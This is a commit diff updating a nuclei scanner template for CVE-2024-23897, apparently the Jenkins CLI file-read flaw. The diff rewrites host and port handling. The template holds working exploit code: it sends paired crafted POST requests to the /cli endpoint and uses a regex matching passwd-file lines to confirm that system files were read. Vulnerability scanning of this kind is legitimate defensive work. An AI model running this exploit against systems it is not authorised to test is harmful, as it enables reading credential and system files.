Merge pull request #10396 from projectdiscovery/fix-CVE-2024-23897

Update CVE-2024-23897

javascript/cves/2024/CVE-2024-23897.yaml

@@ -39,16 +39,18 @@ javascript:
       isPortOpen(Host,Port);
     code: |
       let m = require('nuclei/net');
-      let name=(Host.includes(':') ? Host : Host+":80");
+      let address = Host+":"+Port;
       let conn,conn2;
-      try { conn = m.OpenTLS('tcp', name) } catch { conn=  m.Open('tcp', name)}
+      try { conn = m.OpenTLS('tcp', address) } catch { conn=  m.Open('tcp', address)}
       conn.Send('POST /cli?remoting=false HTTP/1.1\r\nHost:'+Host+'\r\nSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92\r\nSide: download\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 0\r\n\r\n');
-      try { conn2 = m.OpenTLS('tcp', name) } catch { conn2=  m.Open('tcp', name)}
+      try { conn2 = m.OpenTLS('tcp', address) } catch { conn2=  m.Open('tcp', address)}
       conn2.Send('POST /cli?remoting=false HTTP/1.1\r\nHost:'+Host+'\r\nContent-type: application/octet-stream\r\nSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92\r\nSide: upload\r\nConnection: keep-alive\r\nContent-Length: 163\r\n\r\n'+Body)
       resp = conn.RecvString(1000)
     args:
       Body: "{{payload}}"
-      Host: "{{Hostname}}"
+      Host: "{{Host}}"
+      Port: 80,443 # if port not specified, defaults to both 80 and 443
+      exclude-ports: "0" # override default skip list of 80,443,8080,8443
 
     matchers:
       - type: dsl
@@ -59,5 +61,4 @@ javascript:
       - type: regex
         group: 1
         regex:
-          - '\b([a-z_][a-z0-9_-]{0,31})\:x\:'
-# digest: 490a0046304402206177320674364c9d4ca08784b566ee26f51797e931f44e2344b29753e9eb7f4f02200b80670626fb457ae4142d6b191740d2c0e7d499b6a08f246a375ddd7abc4e86:922c64590222798bb761d5b6d8e72950
+          - '\b([a-z_][a-z0-9_-]{0,31})\:x\:'